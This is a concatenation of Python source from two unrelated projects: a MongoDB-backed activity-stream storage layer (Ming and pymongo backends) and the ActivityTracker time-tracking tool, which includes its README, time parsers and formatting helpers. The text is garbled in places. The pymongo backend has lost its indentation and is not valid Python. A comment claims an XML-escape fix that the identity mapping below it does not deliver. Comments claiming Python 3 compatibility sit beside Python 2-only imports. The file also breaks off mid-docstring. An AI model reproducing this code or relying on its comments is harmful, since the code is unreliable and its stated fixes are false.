    :ivar following: List of node ids that this node is following.
    :ivar last_timeline_aggregation: Datetime of the last timeline
        aggregation for this node (None if never aggregated).
    """

    def __init__(self, **kw):
        super().__init__()
        self.followers = []
        self.following = []
        self.last_timeline_aggregation = None
        # Any persisted field (e.g. _id, is_aggregating) may arrive as a
        # keyword and is set verbatim on the instance.
        for key, value in kw.items():
            setattr(self, key, value)
class StoredActivity(ActivityBase):
    """Extends `ActivityBase` with additional attributes that must be persisted
    by `Storage` implementations.

    :ivar score:
        Ranking of this activity relative to other activities in the same
        timeline. May be None if the activity has not been aggregated into
        a timeline.
        :class:`float`
    :ivar owner_id:
        Node id of the owner of the timeline to which this activity belongs.
        May be None if the activity has not yet been aggregated into a
        timeline.
    :ivar node_id:
        Node id to which this activity belongs.
    """
    def __init__(self, **kw):
        super().__init__()
        for k, v in kw.items():
            # Participant fields may arrive as plain dicts (e.g. straight
            # from the database); re-hydrate them into ActivityObjects.
            if k in ('actor', 'obj', 'target') and isinstance(v, dict):
                v = ActivityObject(**v)
            setattr(self, k, v)

    def to_dict(self, **kw):
        """Return a BSON-serializable dict of this activity.

        Keyword arguments override the computed fields (used e.g. to set
        ``owner_id`` when copying an activity into a timeline).
        """
        d = dict(
            # getattr guard: unlike obj/target, actor's node_id was read
            # directly, which raised AttributeError when actor was None
            # even though ActivityObject.to_dict itself tolerates None.
            actor=ActivityObject.to_dict(self.actor,
                                         node_id=getattr(self.actor,
                                                         'node_id', None)),
            verb=self.verb,
            obj=ActivityObject.to_dict(self.obj),
            target=ActivityObject.to_dict(self.target),
            published=self.published,
            node_id=getattr(self, 'node_id', None),
            owner_id=getattr(self, 'owner_id', None),
            score=getattr(self, 'score', None),
            tags=getattr(self, 'tags', None),
        )
        d.update(kw)
        return d

    def __eq__(self, other):
        # Equality is by serialized content, not identity.  NOTE: defining
        # __eq__ without __hash__ makes instances unhashable in Python 3.
        return self.to_dict() == other.to_dict()
class ActivityObject(ActivityObjectBase):
    """Concrete, keyword-initialized activity participant."""

    def __init__(self, **kw):
        super().__init__()
        for key, value in kw.items():
            setattr(self, key, value)

    @staticmethod
    def to_dict(obj, **kw):
        """Serialize ``obj`` to a dict; None or an all-empty object gives {}.

        Extra keyword arguments are merged into the (non-empty) result.
        """
        if not obj or not any((obj.activity_name, obj.activity_url,
                               obj.activity_extras)):
            return {}
        serialized = {
            'activity_name': obj.activity_name,
            'activity_url': obj.activity_url,
            'activity_extras': obj.activity_extras,
        }
        serialized.update(kw)
        return serialized
class Storage:
    """Abstract persistence backend.

    Subclasses must implement every operation; the base class only
    remembers the configuration dict.
    """

    def __init__(self, conf):
        """Store the configuration for use by subclasses.

        :param conf: dictionary of config values
        """
        self.conf = conf

    def create_edge(self, from_node, to_node):
        """Persist a directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.
        """
        raise NotImplementedError

    def destroy_edge(self, from_node, to_node):
        """Remove the directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.
        """
        raise NotImplementedError

    def edge_exists(self, from_node, to_node):
        """True if a directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following`` exists.
        """
        raise NotImplementedError

    def get_node(self, node_id):
        """Return the node for the given node_id."""
        raise NotImplementedError

    def get_nodes(self, node_ids):
        """Return nodes for the given node_ids."""
        raise NotImplementedError

    def create_node(self, node_id):
        """Create and persist a new node."""
        raise NotImplementedError

    def save_node(self, node):
        """Persist changes to a node."""
        raise NotImplementedError

    def set_aggregating(self, node_id):
        """Set an ``is_aggregating`` flag for ``node_id`` if it's not already
        aggregating.

        If the node is already aggregating, return None.  Otherwise, set the
        flag and return the node (creating the node if it doesn't already
        exist).
        """
        raise NotImplementedError

    def save_activity(self, activity):
        """Persist an activity."""
        raise NotImplementedError

    def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
        """Return all activities associated with the given nodes.

        Params:
            since (datetime) - return activities that have occured since this
                               datetime
        """
        raise NotImplementedError

    def save_timeline(self, owner_id, activities):
        """Persist a node's aggregated timeline."""
        raise NotImplementedError

    def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
        """Return the timeline (already-aggregated activities) for node_id."""
        raise NotImplementedError
from datetime import datetime
from ming import Session
from ming import schema as S
from ming.datastore import create_datastore
from ming.odm import (
Mapper,
FieldProperty,
)
from ming.odm.odmsession import ThreadLocalODMSession
from ming.odm.declarative import MappedClass
from .base import (
StoredNode,
StoredActivity,
ActivityObject,
Storage,
)
# Thread-local ODM session bound to the 'activitystream' Ming datastore.
# The datastore itself is registered later, in MingStorage.__init__.
activity_doc_session = Session.by_name("activitystream")
activity_odm_session = session = ThreadLocalODMSession(activity_doc_session)
class Node(MappedClass, StoredNode):
    """Ming-mapped node document (mongo collection: 'nodes')."""
    class __mongometa__:
        session = activity_odm_session
        name = 'nodes'
        indexes = ['node_id']
    _id = FieldProperty(S.ObjectId)
    # Application-level unique identifier (see StoredNode).
    node_id = FieldProperty(str)
    followers = FieldProperty([str])  # node_ids that follow this node
    following = FieldProperty([str])  # node_ids this node follows
    last_timeline_aggregation = FieldProperty(S.DateTime)
    # Guard flag so only one aggregation runs per node at a time.
    is_aggregating = FieldProperty(S.Bool)
class ActivityObjectType(S.Object):
    """Ming schema for an embedded activity participant sub-document.

    With ``actor=True`` the sub-document additionally carries the actor's
    ``node_id`` (only actors are stored with their node id).
    """
    def __init__(self, actor=False, **kw):
        fields = dict(
            activity_name=S.String(),
            activity_url=S.String(),
            # Free-form extras: {None: None} means any key/value allowed.
            activity_extras=S.Object({None: None}, if_missing={}),
        )
        if actor:
            fields['node_id'] = S.String()
        super().__init__(fields=fields, **kw)
class Activity(MappedClass, StoredActivity):
    """Ming-mapped activity document (mongo collection: 'activities').

    Documents with ``owner_id=None`` are raw activities; documents with a
    non-None ``owner_id`` are aggregated timeline copies for that owner.
    """
    class __mongometa__:
        session = activity_odm_session
        name = 'activities'
        # First index serves raw-activity queries, second serves
        # score-sorted timeline queries.
        indexes = [
            ('node_id', 'published'),
            ('owner_id', 'score'),
        ]
    _id = FieldProperty(S.ObjectId)
    owner_id = FieldProperty(S.String, if_missing=None)
    node_id = FieldProperty(str)
    actor = FieldProperty(ActivityObjectType(actor=True))
    verb = FieldProperty(str)
    obj = FieldProperty(ActivityObjectType)
    target = FieldProperty(ActivityObjectType, if_missing=None)
    # NOTE(review): passes the datetime *type* directly rather than
    # S.DateTime — Ming maps python types to schema items, but confirm
    # this is intentional and consistent with Node.last_timeline_aggregation.
    published = FieldProperty(datetime)
    score = FieldProperty(S.Float, if_missing=None)
    tags = FieldProperty([str])
Mapper.compile_all()
class MingStorage(Storage):
    """Ming storage engine.

    Implements the ``Storage`` interface on top of the Ming ODM, using the
    ``Node`` and ``Activity`` MappedClasses declared above.
    """
    def __init__(self, conf):
        """Initialize storage backend.

        :param conf: dictionary of config values
        """
        self.conf = conf
        # Forward any 'activitystream.ming.*' config keys (prefix stripped)
        # straight to the Ming datastore constructor.
        ming_opts = {k[len('activitystream.ming.'):]: v
                     for k, v in conf.items()
                     if k.startswith('activitystream.ming.')}
        datastore = create_datastore(conf['activitystream.master'].rstrip('/') + '/' + conf['activitystream.database'],
                **ming_opts)
        # Bind the datastore under the name that the module-level ODM
        # session was created with at import time.
        Session._datastores['activitystream'] = datastore
        Session.by_name('activitystream').bind = datastore
    def create_edge(self, from_node, to_node):
        """Create a directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.

        upsert=True: node documents are created on demand; $addToSet keeps
        the edge lists duplicate-free.
        """
        Node.query.update({"node_id": from_node.node_id},
                {"$addToSet": {"following": to_node.node_id}}, upsert=True)
        Node.query.update({"node_id": to_node.node_id},
                {"$addToSet": {"followers": from_node.node_id}}, upsert=True)
    def destroy_edge(self, from_node, to_node):
        """Destroy a directed edge from :class:`Node` ``follower`` to
        :class:`Node` ``following``.

        No upsert here: a missing node simply has no edge to remove.
        """
        Node.query.update({"node_id": from_node.node_id},
                {"$pull": {"following": to_node.node_id}})
        Node.query.update({"node_id": to_node.node_id},
                {"$pull": {"followers": from_node.node_id}})
    def edge_exists(self, from_node, to_node):
        """Determine if there is a directed edge from :class:`Node`
        ``follower`` to :class:`Node` ``following``.
        """
        return Node.query.find({"node_id": from_node.node_id,
            "following": to_node.node_id}).first() is not None
    def get_node(self, node_id):
        """Return the node for the given node_id (None if absent)."""
        return Node.query.get(node_id=node_id)
    def get_nodes(self, node_ids):
        """Return nodes for the given node_ids."""
        return Node.query.find({"node_id": {"$in": node_ids}}).all()
    def create_node(self, node_id, **kw):
        """Create, flush and return a new node."""
        node = Node(node_id=node_id, **kw)
        session.flush()
        return node
    def save_node(self, node):
        """Persist pending changes.

        NOTE(review): flushes the whole thread-local ODM session, not just
        this node — confirm that is acceptable for all callers.
        """
        session.flush()
        return node
    def set_aggregating(self, node_id):
        """Set an ``is_aggregating`` flag for ``node_id`` if it's not already
        aggregating.

        If the node is already aggregating, return None. Otherwise, set the
        flag and return the node (creating the node if it doesn't already
        exist).  find_and_modify makes the test-and-set atomic; new=True
        returns the post-update document.
        """
        if not self.get_node(node_id):
            self.create_node(node_id, is_aggregating=False)
        return Node.query.find_and_modify(
            query={'node_id': node_id, 'is_aggregating': {'$ne': True}},
            update={'$set': {'is_aggregating': True}},
            new=True,
        )
    def save_activity(self, activity):
        """Persist an activity.

        The incoming (plain) activity is converted into a mapped Activity
        document; the mapped copy is returned.
        """
        activity = Activity(**activity.to_dict())
        session.flush()
        return activity
    def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
        """Return all raw activities associated with the given nodes.

        Params:
            since (datetime) - return activities that have occured since this
                               datetime

        owner_id is forced to None *after* merging ``query``, so only raw
        (non-timeline) activities are ever returned.
        """
        node_ids = [node.node_id for node in nodes]
        q = {'node_id': {'$in': node_ids}}
        if since:
            q['published'] = {'$gte': since}
        if query:
            q.update(query)
        q['owner_id'] = None
        return Activity.query.find(q, sort=sort, limit=limit, skip=skip).all()
    def save_timeline(self, owner_id, activities):
        """Save a list of activities to a node's timeline."""
        for a in activities:
            # Don't save changes to the original activity, just use it
            # to create a new activity in the timeline.
            session.expunge(a)
            Activity(**a.to_dict(owner_id=owner_id))
        session.flush()
    def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
        """Return the timeline for node_id.

        Timeline is the already-aggregated list of activities in mongo
        (documents whose owner_id equals node_id).
        """
        q = {'owner_id': node_id}
        if query:
            q.update(query)
        return Activity.query.find(q, sort=sort, limit=limit, skip=skip).all()
import pymongo
from .base import (
StoredNode,
StoredActivity,
Storage,
)
class PymongoStorage(Storage):
"""Pymongo storage engine."""
def __init__(self, conf):
"""Initialize storage backend.
:param conf: dictionary of config values
"""
self.conf = conf
self.connection = self._get_connection(conf)
self.db = self.connection[conf['activitystream.database']]
self.activity_collection = \
self.db[conf['activitystream.activity_collection']]
self.node_collection = \
self.db[conf['activitystream.node_collection']]
def _get_connection(self, conf):
if conf['activitystream.master'].startswith('mim://'):
try:
from ming import mim
except ImportError as e:
raise ImportError(str(e) + '. To use mim:// you must have the '
'ming package installed.')
else:
return mim.Connection()
else:
return pymongo.MongoClient(conf['activitystream.master'])
def create_edge(self, from_node, to_node):
"""Create a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.node_collection.update({"node_id": from_node.node_id},
{"$addToSet": {"following": to_node.node_id}}, upsert=True)
self.node_collection.update({"node_id": to_node.node_id},
{"$addToSet": {"followers": from_node.node_id}}, upsert=True)
def destroy_edge(self, from_node, to_node):
"""Destroy a directed edge from :class:`Node` ``follower`` to
:class:`Node` ``following``.
"""
self.node_collection.update({"node_id": from_node.node_id},
{"$pull": {"following": to_node.node_id}})
self.node_collection.update({"node_id": to_node.node_id},
{"$pull": {"followers": from_node.node_id}})
def edge_exists(self, from_node, to_node):
"""Determine if there is a directed edge from :class:`Node`
``follower`` to :class:`Node` ``following``.
"""
result = self.node_collection.find_one({"node_id": from_node.node_id,
"following": to_node.node_id})
return result is not None
def get_node(self, node_id):
"""Return the node for the given node_id.
"""
d = self.node_collection.find_one({"node_id": node_id})
return StoredNode(**d) if d else None
def get_nodes(self, node_ids):
"""Return nodes for the given node_ids.
"""
return [StoredNode(**doc) for doc in
self.node_collection.find({"node_id": {"$in": node_ids}})]
def create_node(self, node_id, **kw):
"""Create a new node.
"""
return self.save_node(StoredNode(node_id=node_id, **kw))
def save_node(self, node):
"""Save a node.
"""
self.node_collection.save(vars(node))
return node
def set_aggregating(self, node_id):
"""Set an ``is_aggregating`` flag for ``node_id`` if it's not already
aggregating.
If the node is already aggregating, return None. Otherwise, set the
flag and return the node (creating the node if it doesn't already
exist).
"""
if not self.get_node(node_id):
self.create_node(node_id, is_aggregating=False)
d = self.node_collection.find_and_modify(
query={'node_id': node_id, 'is_aggregating': {'$ne': True}},
update={'$set': {'is_aggregating': True}},
new=True,
)
return StoredNode(**d) if d else None
def save_activity(self, activity):
"""Save an activity.
"""
self.activity_collection.insert(activity.to_dict())
return activity
def get_activities(self, nodes, since=None, sort=None, limit=None, skip=0, query=None):
"""Return all activities associated with the given nodes.
Params:
since (datetime) - return activities that have occured since this
datetime
"""
node_ids = [node.node_id for node in nodes]
q = {'node_id': {'$in': node_ids}}
if since:
q['published'] = {'$gte': since}
if query:
q.update(query)
q['owner_id'] = None
it = self.activity_collection.find(q, sort=sort, limit=limit, skip=skip)
return [StoredActivity(**doc) for doc in it]
def save_timeline(self, owner_id, activities):
"""Save a list of activities to a node's timeline.
"""
for a in activities:
self.activity_collection.insert(a.to_dict(owner_id=owner_id))
def get_timeline(self, node_id, sort=None, limit=None, skip=0, query=None):
    """Return the timeline for node_id.

    Timeline is the already-aggregated list of activities in mongo,
    i.e. the copies whose ``owner_id`` equals ``node_id``.
    """
    criteria = {'owner_id': node_id}
    if query:
        criteria.update(query)
    cursor = self.activity_collection.find(criteria, sort=sort,
                                           limit=limit, skip=skip)
    return [StoredActivity(**doc) for doc in cursor]
===============
ActivityTracker
===============
A tool for querying various sources to see what time was worked on specific
tasks. Contains plugins for Emacs OrgMode files, Tomboy notes and plain
text files.
Usage
=====
The basic workflow with ActivityTracker is to define a "group" of
files that contain time-based task intervals in some format. At
the moment, ActivityTracker comes with three different parsers:
1. Emacs OrgMode_ files
2. Tomboy notes
3. Plain text files
Setting Up
----------
1. Create a new directory, ``/home/myhomedir/.activitytracker``
2. Setup a new file, ``/home/myhomedir/.activitytracker/config.ini``
3. Add group entries to ``config.ini``
OrgMode_
--------
An entry for a group of OrgMode_ files looks like this::
[File Group: Emacs OrgMode Files]
base_dir = /somedir/org-files
filename_match = [-_a-zA-Z0-9]*[.]org$
parser_name = activitytracker.plugins.orgmode.EmacsOrgModeParser
Please see the OrgMode_ home page for specifics on the OrgMode_
format. ActivityTracker's OrgMode parser has two requirements:
1. Headings meant to be recorded/queried should have the **book** tag
2. The second line after a heading with **book** tag should have a
timestamp indicating the length of time worked
Here is an example entry::
** ActivityTracker :book:
<2011-04-16 Sat 10:00-14:00>
Working on orgmode support
Tomboy
------
An entry for a group of Tomboy_ notes on a recent Gnome configuration
would look like this::
[File Group: Tomboy Notes]
base_dir = /home/myhomedir/.local/share/tomboy
filename_match = [a-zA-Z-0-9]*?[.]note
parser_name = activitytracker.plugins.tomboy.TomboyFileParser
Plain Text Files
----------------
An entry for a group of plain text files would look like this::
[File Group: Legacy Journal Files]
base_dir = /home/myhomedir/Documents/journal
filename_match = month-[a-zA-Z]+-[0-9]+[.]txt$
parser_name = activitytracker.plugins.text.TextFileParser
.. _OrgMode: http://orgmode.org/
.. _Tomboy: http://projects.gnome.org/tomboy/?pagewanted=all
Writing Plugins
===============
The ActivityTracker plugin mechanism expects a *callable* to
be named as the ``parser_name`` value in a file entry group.
While checking files, the *callable* will be invoked (with no
arguments). The *callable* must return an object with a
``parse_input`` function. The ``parse_input`` function
will be invoked for every file matching the criteria.
After ``parse_input`` is invoked at least once, the object must
ensure it has a ``projects`` attribute as an iterable of
*Project* instances.
URLs
====
* http://pypi.python.org/pypi/ActivityTracker
* http://src.serverzen.com/activitytracker
Credits
=======
* Created and maintained by Rocky Burt <rocky AT serverzen DOT com>.
| ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/README.rst | README.rst |
import datetime
import re
import os
import StringIO
import xml.dom
# Clock times like "9:30", "12:05pm"; groups: hour, minute, optional
# am/pm suffix (may be empty).
TIME_RE = re.compile(r'([0-9]?[0-9]):([0-9][0-9])(am|pm|)')
DIGITS = '0123456789'
# Index 0 is None so list position matches the 1-based month number.
MONTH_NAMES = [None, u'january', u'february', u'march', u'april', u'may',
               u'june', u'july', u'august', u'september', u'october',
               u'november', u'december']
# Bidirectional lookup: full name -> number, 3-letter abbreviation ->
# number, and number -> full name.
MONTHS = {}
for x, month in enumerate(MONTH_NAMES):
    if month is not None:
        MONTHS[month] = x
        MONTHS[month[:3]] = x
    MONTHS[x] = month
def parse_time(s):
    """Take the given string and pull out a time object representation.

    Scans *s* for the first digit run, then interprets it (plus an
    optional ``:MM`` and an ``a``/``p``/``am``/``pm`` suffix) as a time
    of day.  Times without a suffix are read as 24-hour clock values.

    >>> parse_time('2:00pm')
    datetime.time(14, 0)
    >>> parse_time('1:00')
    datetime.time(1, 0)
    >>> parse_time('3')
    datetime.time(3, 0)
    >>> parse_time('6p')
    datetime.time(18, 0)
    >>> parse_time('abc def 7:32a')
    datetime.time(7, 32)
    >>> parse_time(u'1:30pm foo bar')
    datetime.time(13, 30)
    >>> parse_time('12:15p')
    datetime.time(12, 15)
    >>> parse_time('12:15')
    datetime.time(12, 15)
    >>> parse_time('foobar')
    Traceback (most recent call last):
    ...
    ValueError: Couldn't find a valid time in 'foobar'
    """
    # Find the first token that starts with a digit; it ends at the next
    # space or at the end of the string.  (ASCII digits inlined so the
    # function has no module-level dependency.)
    first = -1
    last = -1
    for x, c in enumerate(s):
        if first == -1 and c in '0123456789':
            first = x
        elif first != -1 and c == ' ':
            last = x
            break
    if first == -1:
        raise ValueError("Couldn't find a valid time in %r" % str(s))
    if last == -1:
        last = len(s)
    timestr = str(s[first:last])

    colonpos = timestr.find(':')
    apos = timestr.find('a')
    ppos = timestr.find('p')
    ampmpos = -1
    if apos > -1:
        ampmpos = apos
    elif ppos > -1:
        ampmpos = ppos

    # The hour digits end at the colon, the am/pm marker, or the end of
    # the token, whichever comes first.
    if colonpos > -1:
        endhourpos = colonpos
    elif ampmpos > -1:
        endhourpos = ampmpos
    else:
        endhourpos = len(timestr)
    hour = int(timestr[:endhourpos])

    minute = 0
    if colonpos > -1:
        if ampmpos > -1:
            minute = int(timestr[colonpos + 1:ampmpos])
        else:
            minute = int(timestr[colonpos + 1:])

    if ppos > -1 and hour < 12:
        # "1pm" .. "11pm" -> add twelve hours ("12pm" stays noon).
        hour += 12
    elif apos > -1 and hour == 12:
        # BUGFIX: only an explicit "12am" maps to midnight.  The old
        # condition (ppos == -1) also matched bare 24-hour input, so
        # "12:15" (noon) came back as 00:15.
        hour = 0

    tm = datetime.time(hour, minute)
    return tm
class AbstractFileParser(object):
    """Base class for journal-file parsers.

    Subclasses receive the shared project container plus the configured
    default project name, and must implement ``parse_input``.
    """

    def __init__(self, projects, default_project):
        self.projects = projects
        self.default_project = default_project

    def parse_input(self, input):
        """Consume one file-like object; subclasses must override."""
        raise NotImplementedError()
class StandardFileParser(AbstractFileParser):
    """Activitytracker2 has introduced a new format for defining dates, times,
    etc. This new format protocol is referred to as the 'standard' format.
    Any time a pre-activitytracker2 format is referred to it will be called
    the 'legacy' format.
    """

    # A "[...]" command embedded in a journal line, e.g. "[9:00 client/task]".
    GENERAL_COMMAND_RE = re.compile(r'\[([.a-zA-Z0-9:/\-_ #]*?)\]')
    TIME_RE = TIME_RE
    # Day headers of the form "Today: Saturday, 16 April 2011".
    FULL_DATE_RE = re.compile(r'Today: [a-zA-Z]*?, *([0-9][0-9]?) '
                              r'*([a-zA-Z]*) *([0-9]*)')

    default_project = None

    def _dt(self, tm, date=None):
        # Combine a time with the day currently being parsed (or an
        # explicit date) into a full datetime.
        if date == None:
            date = self.current_date
        return datetime.datetime.combine(date, tm)

    def handle_interval(self, tm):
        # Close the interval opened at self.last_time at time ``tm`` and
        # book it, with the note lines collected so far, onto the
        # current project.
        note_list = [x.strip() for x in self.current_note]
        note = '\n'.join(note_list)
        note = note.strip()
        interval = Interval(self._dt(self.last_time),
                            self._dt(tm),
                            note)
        self.projects[self.current_project_name].intervals.append(interval)
        self.current_note = []

    def handle_command(self, cmd, at_beginning=False):
        # Interpret one bracketed command.  A leading time either opens
        # a new interval or closes the currently open one; text after
        # the time names the project for subsequent bookings.
        # check for a time cmd at beginning of the cmd string
        result = self.TIME_RE.search(cmd)
        if result and result.start() == 0:
            spanstart, spanstop = result.span()
            tm = parse_time(cmd)
            if not at_beginning and self.last_time is not None:
                # Mid-line command: close the open interval.
                self.handle_interval(tm)
                self.last_time = None
            elif self.last_time is not None:
                # Back-to-back start commands: close, then reopen at tm.
                self.handle_interval(tm)
                self.last_time = tm
            else:
                self.last_time = tm
            if spanstop - spanstart < len(cmd):
                # Trailing text names the project; "a / b" -> "a/b".
                rest = cmd[spanstop:].strip()
                parts = [x.strip() for x in rest.split('/')]
                self.current_project_name = '/'.join(parts)
            elif self.default_project is not None \
                    and self.current_project_name is None:
                self.current_project_name = self.default_project

    def setup_date(self, date):
        # Hook point for subclasses; records the day being parsed.
        self.current_date = date

    def get_data(self, input):
        """Return the raw journal text for ``input``; subclasses override."""
        raise NotImplementedError()

    def parse_input(self, input):
        """The input argument is required to be a file-like object.
        """
        data = self.get_data(input)
        if data is None:
            return
        # Per-file parser state is reset for every file.
        self.last_time = None
        self.current_date = None
        self.current_note = []
        self.current_project_name = None
        io = StringIO.StringIO(data)
        for line in io.readlines():
            line = line.rstrip()
            result = self.GENERAL_COMMAND_RE.search(line)
            if result and len(result.groups()) > 0:
                at_beginning = result.start() == 0
                self.handle_command(result.groups()[0],
                                    at_beginning)
                if not at_beginning:
                    # Keep the surrounding text as part of the note.
                    self.current_note.append(line)
            if not result:
                result = self.FULL_DATE_RE.search(line)
                if result:
                    sday, smonth, syear = result.groups()
                    day = int(sday)
                    month = MONTHS[smonth.lower()]
                    year = int(syear)
                    date = datetime.date(year, month, day)
                    self.setup_date(date)
                if not result:
                    # Plain text line: accumulate as note content.
                    self.current_note.append(line)
        # If the file ends while an interval is still open for today,
        # close it at "now" rounded to the nearest quarter hour
        # (clamped to :45 so the hour never overflows).
        now = datetime.datetime.now()
        if self.current_date == now.date() \
                and self.current_project_name is not None \
                and self.last_time is not None:
            tm = now.time()
            mins = int((tm.minute + 7.5) // 15 * 15)
            if mins >= 60:
                mins = 45
            tm = tm.replace(minute=mins, second=0, microsecond=0)
            self.handle_interval(tm)
class Interval(object):
    """Some period of time with start and end datetime's and an optional
    note.

    >>> from datetime import datetime
    >>> Interval(datetime(2003, 2, 9), datetime(2003, 2, 12))
    <Interval start=2003-02-09 00:00:00; stop=2003-02-12 00:00:00>
    >>> Interval(datetime(2003, 2, 9), datetime(2003, 2, 12)).total.days
    3
    """

    # Class-level defaults, overwritten per instance in __init__.
    start = None
    stop = None
    note = None

    def __init__(self, start, stop, note=None):
        self.start = start
        self.stop = stop
        self.note = note or u''
        if stop < start:
            raise ValueError('The start date cannot come after the stop date '
                             '(start=%s; stop=%s)' % (str(start), str(stop)))

    @property
    def total(self):
        """Length of the interval as a timedelta."""
        return self.stop - self.start

    def __str__(self):
        return '<Interval start=%s; stop=%s>' % (str(self.start),
                                                 str(self.stop))

    __repr__ = __str__
def flatten_to_text(*nodes):
    """Extract as much text from the node and children nodes (recursively)
    as possible.

    Accepts any mix of DOM nodes and node lists/tuples.

    >>> from xml.dom import minidom
    >>> dom = minidom.parseString('<root>foobar</root>')
    >>> flatten_to_text(dom)
    u'foobar'
    >>> dom = minidom.parseString('<abc>bar<def>hello world</def>foo</abc>')
    >>> flatten_to_text(dom)
    u'barhello worldfoo'
    >>> flatten_to_text(dom.childNodes)
    u'barhello worldfoo'
    >>> dom1 = minidom.parseString('<abc>foo</abc>')
    >>> dom2 = minidom.parseString('<abc>bar</abc>')
    >>> flatten_to_text(dom1, dom2)
    u'foobar'
    """
    # BUGFIX: the module only does "import xml.dom", which does not load
    # the minidom/minicompat submodules referenced below; they happened
    # to be present only when a caller had imported minidom itself.
    # Import them locally so the isinstance checks cannot raise
    # AttributeError.
    import xml.dom.minidom
    import xml.dom.minicompat
    s = u''
    for node in nodes:
        if isinstance(node, xml.dom.minidom.Text):
            # Text nodes contribute their character data directly.
            s += node.wholeText
        else:
            if isinstance(node, (list, tuple, xml.dom.minicompat.NodeList)):
                subnodes = node
            else:
                subnodes = node.childNodes
            for x in subnodes:
                s += flatten_to_text(x)
    return s
def find_config_file(fname):
    """Search for *fname* inside an ``.activitytracker`` directory.

    The current working directory is checked first, then the user's
    home directory.  Returns the full path of the first hit, or None
    when the file exists in neither location.
    """
    search_roots = (os.getcwd(), os.path.expanduser('~'))
    for root in search_roots:
        candidate = os.path.join(root, '.activitytracker', fname)
        if os.path.isfile(candidate):
            return candidate
    return None
import calendar
import datetime
import logging
import re
import textwrap
import time
from activitytracker.base import MONTHS, MONTH_NAMES, find_config_file
logger = logging.getLogger('activitytracker')

ONE_DAY = datetime.timedelta(days=1)

# Index 0 is Monday, matching calendar.weekday().
WEEKDAY_NAMES = [u'monday', u'tuesday', u'wednesday',
                 u'thursday', u'friday', u'saturday', u'sunday']

# Lookup table: full name, 3-letter and 2-letter abbreviations map to
# the weekday number, and the number maps back to the full name.
WEEKDAYS = {}
for x, weekday in enumerate(WEEKDAY_NAMES):
    WEEKDAYS[weekday] = x
    WEEKDAYS[x] = weekday
    WEEKDAYS[weekday[:3]] = x
    WEEKDAYS[weekday[:2]] = x

# Registry mapping tuples of types to formatter callables; consulted by
# pretty() below and filled in next to each _pretty_* helper.
FORMATTERS = {}
def out(s='', padding=''):
    """Print *s* word-wrapped and indented by *padding* (continuation
    lines get one extra space of indent).

    BUGFIX: uses the function form ``print(s)`` instead of the Python
    2-only ``print s`` statement; the parenthesised form behaves
    identically under Python 2 as well.
    """
    s = textwrap.fill(s, initial_indent=padding,
                      subsequent_indent=padding + ' ')
    print(s)
def pretty(v):
    """Render *v* via the first FORMATTERS entry whose type tuple
    matches; anything unregistered falls back to str()."""
    for accepted_types, formatter in FORMATTERS.items():
        if isinstance(v, accepted_types):
            return formatter(v)
    return str(v)
def _pretty_timedelta(v):
"""Create a formatted string for the given timedelta object.
>>> from datetime import timedelta
>>> _pretty_timedelta(timedelta(hours=3))
u'3.0 hrs'
>>> _pretty_timedelta(timedelta(minutes=45))
u'45 mins'
>>> _pretty_timedelta(timedelta(hours=2, minutes=54))
u'2.9 hrs'
"""
hours = (v.days * 24.0) + (v.seconds / 3600.0)
if hours >= 1.0:
return u'%s hrs' % hours
else:
return u'%.0f mins' % (hours * 60.0)
FORMATTERS[(datetime.timedelta,)] = _pretty_timedelta
def _pretty_datetime(v):
    """Create a formatted string for a datetime, date or time object.

    >>> from datetime import datetime, date, time
    >>> _pretty_datetime(datetime(2007, 5, 7, 3, 30))
    u'Mon, May 7, 2007 3:30am'
    >>> _pretty_datetime(date(2007, 3, 22))
    u'Thu, Mar 22, 2007'
    >>> _pretty_datetime(time(13, 21))
    u'1:21pm'
    """
    tm = None
    date = None
    if isinstance(v, (datetime.date, datetime.datetime)):
        # "Mon, May 7, 2007" -- weekday and month abbreviated to three
        # letters.  BUGFIX: u'%s' formatting replaces the Python 2-only
        # unicode() builtin; results are identical on both runtimes.
        date = MONTHS[v.month][:3].title()
        date += u' %s, %s' % (v.day, v.year)
        date = WEEKDAYS[calendar.weekday(v.year, v.month, v.day)] \
               [:3].title() + ', ' + date
    if isinstance(v, (datetime.time, datetime.datetime)):
        # 12-hour clock with am/pm suffix and zero-padded minutes.
        ampm = u'am'
        hour = v.hour
        if hour >= 12:
            ampm = u'pm'
            if hour > 12:
                hour = hour - 12
        if hour == 0:
            hour = 12
            ampm = u'am'
        smin = u'%02d' % v.minute
        tm = u'%s:%s%s' % (hour, smin, ampm)
    if date and tm:
        return date + u' ' + tm
    elif date:
        return date
    elif tm:
        return tm
# Register the datetime/date/time formatter with pretty()'s dispatch table.
FORMATTERS[(datetime.datetime, datetime.date, datetime.time)] = \
    _pretty_datetime
# Minimal XML escaping table: character -> entity reference.
# BUGFIX: the mapping had degenerated into the identity ('>' -> '>'),
# evidently from an entity-unescaping mishap; restore the actual
# entities so the table escapes rather than no-ops.
XML_ESCAPE_CODES = {'>': '>',
                    '<': '<'}
def last_monthday(dt):
    """Retrieve the date representing the last day of the month.

    Accepts either a date or a datetime.  Computed in O(1) with
    calendar.monthrange instead of stepping forward one day at a time.
    (Doctest literals also fixed: leading-zero ints are invalid in
    Python 3.)

    >>> from datetime import datetime, date
    >>> last_monthday(datetime(2003, 3, 27))
    datetime.date(2003, 3, 31)
    >>> last_monthday(date(2003, 11, 23))
    datetime.date(2003, 11, 30)
    >>> last_monthday(date(2003, 2, 2))
    datetime.date(2003, 2, 28)
    >>> last_monthday(date(2000, 2, 2))
    datetime.date(2000, 2, 29)
    """
    # monthrange returns (first weekday, number of days in the month).
    last_day = calendar.monthrange(dt.year, dt.month)[1]
    return datetime.date(dt.year, dt.month, last_day)
class ProjectContainer(object):
    """A collection of project objects. An important implementation note
    is that this container will automatically create projects when a project
    is trying to be retrieved via the [] interface. So an error being raised
    or None being returned will never happen. Also note that even though
    a project container thinks it has intervals, it's interval list will
    be empty (an empty tuple).

      >>> container = ProjectContainer()
      >>> container['abc/def'].intervals
      []
      >>> container['abc/ghi'].intervals
      []
      >>> len(container)
      1
